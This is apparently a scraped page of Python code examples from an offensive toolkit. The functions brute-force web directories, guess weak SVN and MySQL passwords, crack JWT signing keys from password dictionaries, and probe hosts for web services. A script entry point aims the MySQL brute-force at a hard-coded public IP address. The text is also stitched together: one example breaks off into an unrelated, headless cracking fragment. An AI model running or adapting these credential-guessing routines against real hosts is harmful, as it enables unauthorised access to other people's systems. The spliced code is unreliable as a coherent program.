Beispiel #1
 def scan_file_plus(self):
     """Request every entry of the extra word list against the base URL.

     Each line read from ``self.wordsList_plus`` is stripped, passed through
     ``formatPath`` and appended to ``self.url``. The resulting URLs are
     handed to a ``MyThreadPool`` that calls ``self.scan`` on them.
     """
     candidate_urls = []
     for raw_entry in readFile(self.wordsList_plus):
         candidate_urls.append(self.url + formatPath(raw_entry.strip()))
     # Third positional argument is self.maxconnections; presumably the
     # worker/connection cap of the pool -- confirm against MyThreadPool.
     scan_pool = MyThreadPool(self.scan, candidate_urls, self.maxconnections)
     scan_pool.start()
Beispiel #2
 def scan_path(self):
     """Request every entry of the cached path list against the base URL.

     Each line read from ``self.cachePath_txt`` is stripped, passed through
     ``formatPath`` and appended to ``self.url``. The resulting URLs are
     handed to a ``MyThreadPool`` that calls ``self.scan`` on them.
     """
     candidate_urls = []
     for raw_entry in readFile(self.cachePath_txt):
         candidate_urls.append(self.url + formatPath(raw_entry.strip()))
     # Third positional argument is self.maxconnections; presumably the
     # worker/connection cap of the pool -- confirm against MyThreadPool.
     scan_pool = MyThreadPool(self.scan, candidate_urls, self.maxconnections)
     scan_pool.start()
Beispiel #3
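def weakPwdCrack_Svn(ip, user_list=None, pwd_list=None, resultFile=None):
    """Check the SVN service at *ip* for weak user/password pairs.

    Args:
        ip: Host passed to ``connect_svn``.
        user_list: Iterable of user names. Defaults to the lines of
            ``payload/dict/user_database.txt`` under ``base_root``.
        pwd_list: Iterable of candidate passwords. Defaults to the lines of
            ``payload/dict/passwd_top10.txt`` under ``base_root``.
        resultFile: File that receives one line per accepted pair. Defaults
            to a timestamped file in ``result/`` under ``base_root``.

    Every attempt, including the candidate password, is printed to stdout,
    and accepted pairs are appended to *resultFile* in clear text, so both
    the console log and the result file hold credentials and need to be
    stored accordingly.
    """
    # Identity comparison: ``== None`` can be hijacked by a custom __eq__.
    if resultFile is None:
        resultFile = '{}result/{}_{}.txt'.format(base_root, ip, time.time())

    if user_list is None:
        user_list = readFile(
            '{}payload/dict/user_database.txt'.format(base_root))

    if pwd_list is None:
        pwd_list = readFile(
            '{}payload/dict/passwd_top10.txt'.format(base_root))

    # Worker function executed by the thread pool for one candidate password.
    def connectSvn_forThread(passwd, otherArgs):
        ip = otherArgs['ip']
        user = otherArgs['user']
        passwd = passwd.strip()
        print('crack user:[{}]/pwd:[{}]'.format(user, passwd))
        (flag, userAndpwd) = connect_svn(ip, user, password=passwd)
        if flag:
            print('[FOUND] user:[{}]/pwd:[{}],result out is [{}]'.format(
                user, passwd, userAndpwd))
            # Concurrent workers may race on the result file. The sleeps only
            # make interleaved writes less likely; they do not serialise them.
            # NOTE(review): a lock around writeFile would close the race.
            time.sleep(1.5)
            # The leading '[' of the record is unmatched; kept as-is so the
            # result-file format stays unchanged.
            writeFile(resultFile,
                      '[user:[{}]/pwd:[{}]\r\n'.format(user, passwd))
            time.sleep(1.5)

    # First pass: candidates derived from the user name itself.
    for user in user_list:
        user = user.strip()
        userNameAlikePwd = getUserNameAlikePwd(user)
        otherArgs = {'ip': ip, 'user': user}
        svn_pool = MyThreadPool(connectSvn_forThread,
                                userNameAlikePwd,
                                other_args=otherArgs)
        svn_pool.start()

    # Second pass: candidates from the password dictionary.
    for user in user_list:
        user = user.strip()
        otherArgs = {'ip': ip, 'user': user}
        svn_pool = MyThreadPool(connectSvn_forThread,
                                pwd_list,
                                other_args=otherArgs)
        svn_pool.start()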
Beispiel #4
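def weakPwdCrack_jwt(token, code='ascii', key_list=None, resultFile=None):
    """Test the signing key of *token* against a list of candidate keys.

    Args:
        token: Token forwarded to ``jwtCrack`` as ``other_args``.
        code: Accepted for interface compatibility; not used in this function.
        key_list: Iterable of candidate keys. Defaults to the lines of
            ``payload/dict/passwd_1w.txt`` under ``base_root``.
        resultFile: File that receives the result line. Defaults to a
            timestamped file in ``result/`` under ``base_root``.
    """
    # Identity comparison: ``== None`` can be hijacked by a custom __eq__.
    if key_list is None:
        key_list = readFile('{}payload/dict/passwd_1w.txt'.format(base_root))
    if resultFile is None:
        resultFile = '{}result/jwt_{}.txt'.format(base_root, time.time())

    key_pool = MyProcessPool(jwtCrack, key_list, other_args=token)
    key_pool.start()
    # The '[FOUND]' line is written unconditionally and in clear text.
    # NOTE(review): confirm that start() blocks until the workers finish and
    # what ``result`` holds when no candidate matches -- not visible here.
    writeFile(resultFile, '[FOUND] key:{}'.format(key_pool.result))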
Beispiel #5
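def getWeb(ip_port_list=None,targetFile=None,resultFile=None):
    """Run ``isWeb`` over a list of targets and write the pool's result to a file.

    Args:
        ip_port_list: Iterable of targets handed to the thread pool.
        targetFile: Optional file of targets; when given, its lines replace
            *ip_port_list*.
        resultFile: File that receives the result. Defaults to a timestamped
            file in ``result/`` under ``base_root``.
    """
    if targetFile:
        ip_port_list = readFile(targetFile)
    # Identity comparison: ``== None`` can be hijacked by a custom __eq__.
    if resultFile is None:
        resultFile = '{}result/web_{}.txt'.format(base_root, time.time())

    # NOTE(review): when neither ip_port_list nor targetFile is supplied the
    # pool receives None; how MyThreadPool reacts is not visible here.
    web_pool = MyThreadPool(isWeb, ip_port_list)
    web_pool.start()
    writeFile(resultFile, '{}'.format(web_pool.result))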
Beispiel #6
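    def creatCachePathPayload(self):
        """Rebuild the path and file word-list caches and de-duplicate them.

        The path cache (``self.cachePath_txt``) receives every stripped line
        of ``self.wordsFile`` plus every entry of ``self.keyWords``. The file
        cache (``self.cacheFile_txt``) receives each of those names combined
        with each extension from ``self.getExtensionList()``. Both caches are
        then passed to ``getRemoveDupFile`` and the resulting ``.rd`` files
        are moved over the cache files.
        """
        self.clearCacheTxt()
        extensionList = self.getExtensionList()

        # Build the path cache.
        try:
            for fileName in readFile(self.wordsFile):
                writeFile(self.cachePath_txt, '{}\n'.format(fileName.strip()))
            for fileName in self.keyWords:
                writeFile(self.cachePath_txt, '{}\n'.format(fileName))
        except Exception as e:
            # Best effort: report the failure and continue with what was written.
            print(e)

        # Build the file cache: every name combined with every extension.
        try:
            for fileName in readFile(self.wordsFile):
                for exten in extensionList:
                    writeFile(
                        self.cacheFile_txt,
                        '{}.{}\n'.format(fileName.strip(), exten.strip()))
            for fileName in self.keyWords:
                for exten in extensionList:
                    writeFile(
                        self.cacheFile_txt,
                        '{}.{}\n'.format(fileName.strip(), exten.strip()))
        except Exception as e:
            # Best effort: report the failure and continue with what was written.
            print(e)

        getRemoveDupFile(self.cachePath_txt)
        getRemoveDupFile(self.cacheFile_txt)
        self.clearCacheTxt()
        # Move the '.rd' outputs over the cache files without going through a
        # shell: the paths used to be interpolated into an ``mv`` command line,
        # where spaces or shell metacharacters in a path would be interpreted
        # by the shell. os.replace takes the paths as plain arguments (no shell
        # expansion). Failures are reported and skipped, matching the old
        # behaviour in which a failing ``mv`` did not raise.
        for cache_txt in (self.cachePath_txt, self.cacheFile_txt):
            try:
                os.replace(cache_txt + '.rd', cache_txt)
            except OSError as e:
                print(e)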
            'port': port,
            'database': database
        }
        crackFtpThread = MyThreadPool(connectMysql_forThread,
                                      userNameAlikePwd,
                                      other_args=otherArgs)
        crackFtpThread.start()

    # 爆破字典里面的密码
    for user in user_list:
        user = user.strip()
        otherArgs = {
            'ip': ip,
            'user': user,
            'port': port,
            'database': database
        }
        crackFtpThread = MyThreadPool(connectMysql_forThread,
                                      pwd_list,
                                      other_args=otherArgs)
        crackFtpThread.start()


# Script entry point: runs weakPwdCrack_mysql against one host with the short
# password list and prints the elapsed wall-clock time.
if __name__ == '__main__':
    last_time = time.time()
    # pwd_list = readFile('{}payload/dict/passwd_1w.txt'.format(base_root))
    pwd_list = readFile('{}payload/dict/passwd_top10.txt'.format(base_root))
    # NOTE(review): the target address is hard-coded in the source; taking it
    # from configuration or the command line would keep the scope of each run
    # explicit and reviewable.
    ip = '167.88.178.54'  # scan target
    weakPwdCrack_mysql(ip, pwd_list=pwd_list)
    print('total time is {}'.format(time.time() - last_time))
def file_dedu(target_file, result_file):
    """Write the de-duplicated entries of *target_file* to *result_file*.

    The entries come from ``readFile(target_file)``, are reduced by
    ``deduplication_list`` and are passed to ``writeFile`` one at a time,
    unchanged (no separator is added here).
    """
    unique_entries = deduplication_list(readFile(target_file))
    for entry in unique_entries:
        writeFile(result_file, entry)